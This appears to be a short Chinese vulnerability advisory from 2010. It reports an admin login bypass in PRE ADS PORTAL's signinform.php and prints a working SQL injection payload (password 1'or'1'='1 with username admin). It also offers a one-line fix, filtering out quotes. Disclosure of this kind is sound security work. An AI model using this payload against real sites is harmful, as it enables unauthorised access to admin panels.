PRE ADS PORTAL 后台验证绕过(万能密码)漏洞
时间:2010-11-14 来源:Cru3l.b0y
发布日期:2010-11.14
发布作者:Cru3l.b0y
影响版本:未知
官方地址:http://www.preproject.com
漏洞类型:密码验证
漏洞描述:后台密码验证设计错误,导致万能密码绕过漏洞。
漏洞测试:
登录页面 signinform.php
Username : admin
Password : 1'or'1'='1
修复方案:过滤掉引号~
标签分类:
相关阅读 更多 +